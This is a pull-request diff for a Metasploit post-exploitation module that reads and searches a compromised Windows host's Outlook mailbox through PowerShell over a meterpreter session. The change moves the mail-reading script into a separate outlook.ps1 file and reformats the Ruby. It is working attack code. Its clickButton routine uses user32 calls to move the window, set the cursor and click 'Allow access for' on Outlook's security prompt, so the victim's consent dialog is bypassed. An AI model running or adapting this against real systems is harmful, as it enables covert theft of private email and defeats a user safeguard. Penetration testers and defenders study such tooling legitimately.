Merge pull request #2 from FireFart/outlook_fix

Outlook fix

data/post/powershell/outlook.ps1

@@ -0,0 +1,47 @@
+function GetSubfolders($root) {
+  $folders = @()
+  $folders += $root
+  foreach ($folder in $root.Folders) {
+    $folders += GetSubfolders($folder)
+  }
+  return $folders
+}
+
+function List-Folder {
+  Clear-host
+  Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
+  $Outlook = New-Object -ComObject Outlook.Application
+  $Namespace = $Outlook.GetNameSpace("MAPI")
+  $account = $NameSpace.Folders
+  $folders = @()
+  foreach ($acc in $account) {
+    foreach ($folder in $acc.Folders) {
+      $folders += GetSubfolders($folder)
+    }
+  }
+  $folders | FT FolderPath
+}
+
+function Get-Emails {
+  param ([String]$searchTerm,[String]$Folder)
+  Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
+  $Outlook = New-Object -ComObject Outlook.Application
+  $Namespace = $Outlook.GetNameSpace("MAPI")
+  $account = $NameSpace.Folders
+  $found = $false
+  foreach ($acc in $account) {
+    try {
+      $Email = $acc.Folders.Item($Folder).Items
+      $result = $Email | Where-Object {$_.HTMLBody -like '*' + $searchTerm + '*' -or $_.TaskSubject -like '*' + $searchTerm + '*'}
+      if($result) {
+        $found = $true
+        $result | Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
+      }
+    } catch {
+      Write-Host "Folder" $Folder "not found in mailbox" $acc.Name
+    }
+  }
+  if(-Not $found) {
+    Write-Host "Searchterm" $searchTerm "not found"
+  }
+}

modules/post/windows/gather/outlook.rb

@@ -9,111 +9,63 @@ class Metasploit3 < Msf::Post
   include Msf::Post::Windows::Registry
   include Msf::Post::Windows::Powershell
 
-        A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
-        ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", "de_AT" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }
+  A_HASH = { "en_US" => "Allow", "NL" => "Toestaan", "de_DE" => "Erteilen", "de_AT" => "Erteilen" }
+  ACF_HASH = { "en_US" => "Allow access for", "NL" => "Toegang geven voor", "de_DE" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr", "de_AT" => "Zugriff gew\xc3\xa4hren f\xc3\xbcr" }
 
   def initialize(info={})
     super(update_info(info,
-    'Name'          => 'Windows Gather Outlook Email Messages',
-    'Description'   => %q{
-      This module allows you to read and search email messages from the local Outlook installation using powershell. Please note that this module is manipulating the victims keyboard/mouse.
-      If a victim is behind the target system, he might notice the activities of this module. Tested on Windows 8.1 x64 with Office 2013.
-    },
-    'License'       => MSF_LICENSE,
-    'Author'        => [ 'Wesley Neelen <security[at]forsec.nl>' ],
-    'References'    => [ 'URL', 'https://forsec.nl/2014/11/reading-outlook-using-metasploit' ],
-    'Platform'      => [ 'win' ],
-    'Arch'	        => [ 'x86', 'x64' ],
-    'SessionTypes'  => [ 'meterpreter'],
-    'Actions'       => [
-                       [ 'LIST', { 'Description' => 'Lists all folders' } ],
-                       [ 'SEARCH', { 'Description' => 'Searches for an email' } ]
-    ],
-    'DefaultAction' => 'LIST'
-  ))
+      'Name'          => 'Windows Gather Outlook Email Messages',
+      'Description'   => %q{
+        This module allows you to read and search email messages from the local Outlook installation using powershell. Please note that this module is manipulating the victims keyboard/mouse.
+        If a victim is behind the target system, he might notice the activities of this module. Tested on Windows 8.1 x64 with Office 2013.
+      },
+      'License'       => MSF_LICENSE,
+      'Author'        => [ 'Wesley Neelen <security[at]forsec.nl>' ],
+      'References'    => [ 'URL', 'https://forsec.nl/2014/11/reading-outlook-using-metasploit' ],
+      'Platform'      => [ 'win' ],
+      'Arch'          => [ 'x86', 'x64' ],
+      'SessionTypes'  => [ 'meterpreter' ],
+      'Actions'       => [
+        [ 'LIST', { 'Description' => 'Lists all folders' } ],
+        [ 'SEARCH', { 'Description' => 'Searches for an email' } ]
+      ],
+      'DefaultAction' => 'LIST'
+    ))
 
-  register_options(
-  [
-    OptString.new('FOLDER', [ false, ' The e-mailfolder to read (e.g. Inbox)' ]),
-    OptString.new('KEYWORD', [ false, ' Search e-mails by the keyword specified here' ]),
-    OptString.new('A_TRANSLATION', [ false, ' Fill in the translation of the word "Allow" in the targets system language, to click on the security popup.' ]),
-    OptString.new('ACF_TRANSLATION', [ false, ' Fill in the translation of the phrase "Allow access for" in the targets system language, to click on the security popup.' ]),
+    register_options(
+    [
+      OptString.new('FOLDER', [ false, 'The e-mailfolder to read (e.g. Inbox)' ]),
+      OptString.new('KEYWORD', [ false, 'Search e-mails by the keyword specified here' ]),
+      OptString.new('A_TRANSLATION', [ false, 'Fill in the translation of the word "Allow" in the targets system language, to click on the security popup.' ]),
+      OptString.new('ACF_TRANSLATION', [ false, 'Fill in the translation of the phrase "Allow access for" in the targets system language, to click on the security popup.' ]),
     ], self.class)
   end
 
-  def listBoxes
-    # This function prints a listing of available mailbox folders
-    psh_script = %Q|
-    function GetSubfolders($root) {
-        $folders = @()
-        $folders += $root
-        foreach ($folder in $root.Folders) {
-            $folders += GetSubfolders($folder)
-        }
-        return $folders
-    }
-    function List-Folder {
-        Clear-host
-        Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
-        $Outlook = New-Object -ComObject Outlook.Application
-        $Namespace = $Outlook.GetNameSpace("MAPI")
-        $account = $NameSpace.Folders
-        $folders = @()
-        foreach ($acc in $account) {
-            foreach ($folder in $acc.Folders) {
-                $folders += GetSubfolders($folder)
-            }
-        }
-        $folders \| FT FolderPath
-    }
-    List-Folder
-    |
+  def execute_outlook_script(command)
+    base_script = File.read(File.join(Msf::Config.data_directory, "post", "powershell", "outlook.ps1"))
+    psh_script = base_script << command
     compressed_script = compress_script(psh_script)
     cmd_out, runnings_pids, open_channels = execute_script(compressed_script)
     while(d = cmd_out.channel.read)
-       print ("#{d}")
+      print ("#{d}")
     end
     currentidle = session.ui.idle_time
-    print("\n")
-    print_status("System has currently been idle for #{currentidle} seconds")
+    vprint_status("System has currently been idle for #{currentidle} seconds")
   end
 
+  # This function prints a listing of available mailbox folders
+  def listBoxes
+    command = 'List-Folder'
+    execute_outlook_script(command)
+  end
+
+  # This functions reads Outlook using powershell scripts
   def readEmails(folder,keyword,atrans,acftrans)
-    # This functions reads Outlook using powershell scripts
     view = framework.threads.spawn("ButtonClicker", false) {
       clickButton(atrans,acftrans)
     }
-    psh_script = %Q|
-    function Get-Emails {
-    param ([String]$searchTerm,[String]$Folder)
-    Add-Type -Assembly "Microsoft.Office.Interop.Outlook"
-    $Outlook = New-Object -ComObject Outlook.Application
-    $Namespace = $Outlook.GetNameSpace("MAPI")
-    $account = $NameSpace.Folders
-    $found = $false
-    foreach ($acc in $account) {
-         try {
-             $Email = $acc.Folders.Item($Folder).Items
-             $result = $Email \| Where-Object {$_.HTMLBody -like '*' + $searchTerm + '*' -or $_.TaskSubject -like '*' + $searchTerm + '*'}
-             if($result) {
-                $found = $true
-                $result \| Format-List To, SenderEmailAddress, CreationTime, TaskSubject, HTMLBody
-             }
-          } catch {
-             Write-Host "Folder" $Folder "not found in mailbox" $acc.Name
-          }
-       }
-       if(-Not $found) {
-          Write-Host "Searchterm" $searchTerm "not found"
-       }
-    }
-    Get-Emails "#{keyword}" "#{folder}"
-    |
-    compressed_script = compress_script(psh_script)
-    cmd_out, runnings_pids, open_channels = execute_script(compressed_script, 120)
-    while(d = cmd_out.channel.read)
-       print ("#{d}")
-    end
+    command = "Get-Emails \"#{keyword}\" \"#{folder}\""
+    execute_outlook_script(command)
   end
 
   def clickButton(atrans,acftrans)
@@ -121,17 +73,17 @@ class Metasploit3 < Msf::Post
     sleep 1
     hwnd = client.railgun.user32.FindWindowW(nil, "Microsoft Outlook")
     if hwnd != 0
-        hwndChildCk = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "&#{acftrans}")
-        client.railgun.user32.SendMessageW(hwndChildCk['return'], 0x00F1, 1, nil)
-        client.railgun.user32.MoveWindow(hwnd['return'],150,150,1,1,true)
-        hwndChild = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "#{atrans}")
-        client.railgun.user32.SetActiveWindow(hwndChild['return'])
-        client.railgun.user32.SetForegroundWindow(hwndChild['return'])
-        client.railgun.user32.SetCursorPos(150,150)
-        client.railgun.user32.mouse_event(0x0002,150,150,nil,nil)
-        client.railgun.user32.SendMessageW(hwndChild['return'], 0x00F5, 0, nil)
+      hwndChildCk = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "&#{acftrans}")
+      client.railgun.user32.SendMessageW(hwndChildCk['return'], 0x00F1, 1, nil)
+      client.railgun.user32.MoveWindow(hwnd['return'],150,150,1,1,true)
+      hwndChild = client.railgun.user32.FindWindowExW(hwnd['return'], nil, "Button", "#{atrans}")
+      client.railgun.user32.SetActiveWindow(hwndChild['return'])
+      client.railgun.user32.SetForegroundWindow(hwndChild['return'])
+      client.railgun.user32.SetCursorPos(150,150)
+      client.railgun.user32.mouse_event(0x0002,150,150,nil,nil)
+      client.railgun.user32.SendMessageW(hwndChild['return'], 0x00F5, 0, nil)
     else
-        print_error("Error while clicking on the Outlook security notification. Window could not be found")
+      print_error("Error while clicking on the Outlook security notification. Window could not be found")
     end
   end
 
@@ -146,20 +98,20 @@ class Metasploit3 < Msf::Post
     # OS language check
     sysLang = client.sys.config.sysinfo['System Language']
     A_HASH.each do |key, val|
-        if sysLang == key
-           langNotSupported = false
-           atrans = A_HASH[sysLang]
-           acftrans = ACF_HASH[sysLang]
-        end
+      if sysLang == key
+        langNotSupported = false
+        atrans = A_HASH[sysLang]
+        acftrans = ACF_HASH[sysLang]
+      end
     end
 
     if allow and allow_access_for
-       atrans = allow
-       acftrans = allow_access_for
+      atrans = allow
+      acftrans = allow_access_for
     else
-       if langNotSupported == true
-           fail_with(Failure::Unknown, "System language not supported, you can specify the targets system translations in the options A_TRANSLATION (Allow) and ACF_TRANSLATION (Allow access for)")
-       end
+      if langNotSupported == true
+        fail_with(Failure::Unknown, "System language not supported, you can specify the targets system translations in the options A_TRANSLATION (Allow) and ACF_TRANSLATION (Allow access for)")
+      end
     end
 
     # Outlook installed
@@ -176,9 +128,9 @@ class Metasploit3 < Msf::Post
 
     # Powershell installed check
     if have_powershell?
-        print_good("Powershell is installed.")
+      print_good("Powershell is installed.")
     else
-        fail_with(Failure::Unknown, "Powershell is not installed")
+      fail_with(Failure::Unknown, "Powershell is not installed")
     end
 
     # Check whether target system is locked
@@ -190,7 +142,7 @@ class Metasploit3 < Msf::Post
     case action.name
     when 'LIST'
       print_good('Available folders in the mailbox: ')
-      listBoxes()
+      listBoxes
     when 'SEARCH'
       readEmails(folder,keyword,atrans,acftrans)
     else